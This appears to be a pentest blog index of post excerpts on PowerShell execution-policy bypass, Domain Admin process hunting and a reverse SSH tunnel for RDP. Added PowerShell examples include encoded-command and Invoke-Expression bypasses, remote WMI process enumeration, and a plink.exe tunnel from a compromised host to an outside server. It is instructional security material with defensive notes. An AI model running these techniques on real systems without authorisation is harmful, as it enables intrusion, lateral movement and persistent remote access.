Scott Sutherland
September 9th, 2014

15 Ways to Bypass the PowerShell Execution Policy

By default (the Restricted execution policy on Windows client editions) PowerShell refuses to run .ps1 script files. The execution policy is a safety control rather than a security boundary, but it is still a hurdle for penetration testers, sysadmins, and developers, and it doesn’t have to be. In this blog I’ll cover 15 ways to bypass the PowerShell execution policy without having local administrator rights on the system. I’m sure […]
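As an added illustration of the post’s premise (this is my example, not code from the NetSPI article), the script below first shows where the effective policy comes from and then runs a throwaway script several ways that need no administrator rights. The script path is a placeholder; everything else is standard PowerShell 3.0+ behaviour.

```powershell
# Added example, not the post's own code. Writes a harmless demo script to %TEMP%
# and runs it without touching the machine-wide execution policy.
$script = Join-Path $env:TEMP 'demo.ps1'
Set-Content -Path $script -Value 'Write-Output "ran as $env:USERNAME"'

# 1. Where does the effective policy come from? MachinePolicy and UserPolicy are
#    set by Group Policy and override everything below them; Process and
#    CurrentUser are writable by an ordinary user.
Get-ExecutionPolicy -List

# 2. Process scope: changes only this PowerShell process, needs no admin rights.
#    If a GPO-defined MachinePolicy/UserPolicy exists, the cmdlet still succeeds
#    but warns that the GPO setting wins; none of the tricks below help then.
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass -Force
& $script

# 3. The same thing for a child process via the command-line switch.
powershell.exe -NoProfile -ExecutionPolicy Bypass -File $script

# 4. Never load the file as a script at all: read the text and evaluate it.
Get-Content -Path $script -Raw | Invoke-Expression

# 5. Hand the code over base64-encoded (UTF-16LE, as -EncodedCommand expects),
#    so no .ps1 file is opened by the child process.
$bytes   = [System.Text.Encoding]::Unicode.GetBytes((Get-Content -Path $script -Raw))
$encoded = [System.Convert]::ToBase64String($bytes)
powershell.exe -NoProfile -EncodedCommand $encoded

Remove-Item -Path $script
```

The defensive takeaway is the same in every case: only a Group Policy-defined policy survives these, and even that only blocks the script loader, not a user who can type commands. Treat execution policy as accident prevention and rely on AppLocker or WDAC, constrained language mode, and script block logging for actual control.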

Kevin Burns
July 21st, 2014

Stealing unencrypted SSH-agent keys from memory

If you've ever used SSH keys to manage multiple machines, then chances are you've used SSH-agent. This tool is designed to keep an SSH key in memory so that the user doesn't have to type their passphrase in every time. However, this creates a security risk. A user running as root may have the […]

Ryan Gandrud
June 16th, 2014

15 Ways to Download a File

Pentesters often upload files to compromised boxes to help with privilege escalation, or to maintain a presence on the machine. This blog will cover 15 different ways to move files from your machine to a compromised system. It should be interesting for penetration testers who have a presence on a box and need post-exploitation options, […]

Scott Sutherland
April 28th, 2014

Decrypting IIS Passwords to Break Out of the DMZ: Part 2

In my last blog I showed how to use native Windows tools to break out of DMZ networks by decrypting database connection strings in IIS web.config files, and using them to pivot through SQL Servers. If you’re interested it can be found at Decrypting IIS Passwords to Break Out of the DMZ: Part 1. In […]

Scott Sutherland
February 10th, 2014

Decrypting IIS Passwords to Break Out of the DMZ: Part 1

From the perspective of a penetration tester, it would be nice if every vulnerability provided a direct path to high-value systems on the internal network. However, the reality is that we aren’t always that lucky, and sometimes we land on an application server in the DMZ network first. In this blog I’ll cover how to use […]

Scott Sutherland
January 16th, 2013

10 Evil User Tricks for Bypassing Anti-Virus

Many anti-virus solutions are deployed with weak configurations that provide end users with the ability to quickly disable or work around the product if they wish. As a result, even users without super hacker “skillz” can run malicious executables (intentionally or not) without having to actually modify them in any way to avoid […]

Scott Sutherland
July 16th, 2012

10 Techniques for Blindly Mapping Internal Networks

Occasionally clients require that all network and system discovery be done completely blind during internal pentests (meaning no IP addresses are provided). I know that a lot of people have been exposed to ping and port scan discovery techniques, but on large networks those methods alone can be pretty time consuming. So in this […]

Scott Sutherland
July 9th, 2012

5 Ways to Find Systems Running Domain Admin Processes

Migrating to Domain Admin processes is a common way penetration testers are able to impersonate Domain Admin accounts on the network. However, before a pentester can do that, they need to know what systems those processes are running on. In this blog I’ll cover 5 techniques to help you do that. The techniques that […]
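One way to answer the question the post poses, added here as an example of mine rather than one of the article’s five techniques: enumerate Domain Admins from AD, then ask each target over WMI who owns its processes. It assumes the RSAT ActiveDirectory module is installed, a hosts.txt listing target computer names, and that the account running it already has local administrator rights on those targets (remote WMI requires that).

```powershell
# Added example, not code from the post. Assumptions: ActiveDirectory module
# (RSAT) available, .\hosts.txt holds one computer name per line, and the
# calling account is a local admin on each target so remote WMI is allowed.
Import-Module ActiveDirectory

# Resolve Domain Admins recursively so members of nested groups are included,
# and capture the domain's NetBIOS name to avoid matching a same-named local account.
$domainAdmins = Get-ADGroupMember -Identity 'Domain Admins' -Recursive |
    Select-Object -ExpandProperty SamAccountName
$domainName   = (Get-ADDomain).NetBIOSName

$targets = Get-Content -Path .\hosts.txt

foreach ($computer in $targets) {
    try {
        $procs = Get-WmiObject -Class Win32_Process -ComputerName $computer -ErrorAction Stop
    } catch {
        # Unreachable host, firewall, or access denied: note it and move on.
        Write-Warning ('{0}: {1}' -f $computer, $_.Exception.Message)
        continue
    }

    foreach ($p in $procs) {
        $owner = $p.GetOwner()   # ReturnValue 0 means Domain and User are populated
        if ($owner.ReturnValue -eq 0 -and
            $owner.Domain -eq $domainName -and
            $domainAdmins -contains $owner.User) {
            [pscustomobject]@{
                Computer = $computer
                Owner    = '{0}\{1}' -f $owner.Domain, $owner.User
                Process  = $p.Name
                PID      = $p.ProcessId
            }
        }
    }
}
```

Pipe the output to `Format-Table` or `Export-Csv` for a target list. Because this touches every host over DCOM, it is noisy; on a real engagement the same WMI query against a handful of servers likely to host admin sessions (jump boxes, management servers) is usually enough.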

Scott Sutherland
June 15th, 2012

How to Access RDP over a Reverse SSH Tunnel

In this blog I’ll be providing instructions for establishing an RDP connection over a reverse SSH tunnel using plink.exe and FreeSSHd. I’ll also show how to do it without having to accept SSH server keys interactively, which can come in handy when pentesting. The methods outlined can also be used to tunnel other protocols over […]
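The command the post is describing, reconstructed as an added example of my own (not the article’s text): plink.exe on the compromised Windows host opens a reverse tunnel to the tester’s SSH server and the host-key prompt is answered from stdin so nothing has to be typed. The server address, account and password are placeholders; the SSH server (FreeSSHd or any sshd) must have TCP forwarding enabled.

```powershell
# Added example, not the post's own commands. Placeholders: the tester's SSH
# server at 203.0.113.5 (documentation range) with a low-privilege account
# "tunnel". Run on the compromised host with plink.exe in the current directory.
$sshServer = '203.0.113.5'
$sshUser   = 'tunnel'
$sshPass   = 'ChangeMe-Placeholder'   # -pw puts the password in the process command
                                      # line; use a throwaway account, or -i with a key

# -R 3390:127.0.0.1:3389  : port 3390 on the SSH server is forwarded back to RDP
#                           (3389) on this machine.
# -N                      : no remote shell, just the forward.
# Piping "y" answers plink's "Store key in cache? (y/n)" host-key prompt, which is
# what makes this usable non-interactively; if the key is already cached the
# input is simply ignored. The job keeps plink running in the background.
$tunnel = Start-Job -ScriptBlock {
    param($exe, $user, $pass, $server)
    'y' | & $exe -N -l $user -pw $pass -R 3390:127.0.0.1:3389 $server
} -ArgumentList (Resolve-Path .\plink.exe).Path, $sshUser, $sshPass, $sshServer

Start-Sleep -Seconds 5
Receive-Job -Job $tunnel -Keep          # surfaces auth or host-key errors, if any
netstat -an | findstr ":22 "            # expect an ESTABLISHED session to $sshServer

# On the SSH server, RDP to the tunnel end: mstsc /v:127.0.0.1:3390
# Tear down when finished:
# Stop-Job -Job $tunnel; Remove-Job -Job $tunnel
```

Two caveats a tester should keep in mind: blindly answering "y" to the host-key prompt means the tunnel will happily connect to whoever is at that address, so make sure the server is yours and not something a defender is impersonating, and the reverse listener is bound to the SSH server’s loopback by default, which is exactly what you want so that the RDP port is not exposed to anyone else.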